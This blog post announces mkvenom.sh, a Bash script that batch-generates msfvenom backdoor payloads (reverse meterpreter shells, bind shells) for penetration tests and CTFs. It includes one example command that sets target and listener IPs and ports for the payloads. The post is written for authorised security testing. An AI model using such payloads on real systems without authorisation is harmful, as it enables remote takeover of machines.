The popular Metasploit Framework includes a payload generation tool called
msfvenom. This is generally used to create backdoor scripts or binaries which are used when taking control of a target computer. During penetration tests, CTFs and exams (like OSCP) one can spend a lot of time typing out
msfvenom commands and waiting for them to complete.
Today I am releasing
mkvenom.sh: a Bash script which generates a selection of common Metasploit Framework
msfvenom payloads for specified target machine. The idea is to kick this off in the background while performing initial scanning/enumeration of a target to speed up your penetration testing workflow (see also: ptboot.sh). It’s a slow script and it’s imprecise, but in some circumstances it can be a good time saving tool.
This Linux Bash script will create commonly used Metasploit Framework payloads such as reverse meterpreter shells, bind shells etc., including 32-bit/64-bit and staged/inline variants.
It will produce a directory called
payloads which contains a library of ready to use payload files built using the local and remote TCP/IP parameters specified via the command line:
The only requirements are the presence of Metasploit Framework 4.16+ and the Bash shell. The script is intended for use in a Linux environment and was developed and tested using Kali Linux 2018.1.
Clone or download the
mkvenom.sh file from this repository in to your Linux environment. You might want to consider placing it in
/usr/local/bin so that it can be executed regardless of the shell’s current working directory.
A directory called
payloads will be created in the current working directory when the script runs.
The command line usage syntax is:
For example, if the local penetration tester’s system has an IP address of 192.168.10.200 and a remote Linux target system has an IP address of 10.20.20.1:
/usr/local/bin/mkvenom.sh 10.20.20.1 4444 192.168.10.200 443 linux
In the above example, payloads which bind to an address on the target would use port 4444 whilst payloads which make reverse connections back to the local machine would use port 443.
Running this tool early in the target enumeration phase means suitable MSF payloads will be ready and waiting for use when the time comes.
I have released this script under the MIT licence. It can be downloaded from the mkvenom GitHub repository.
Did you like this article? Please consider supporting this site.
Page last updated: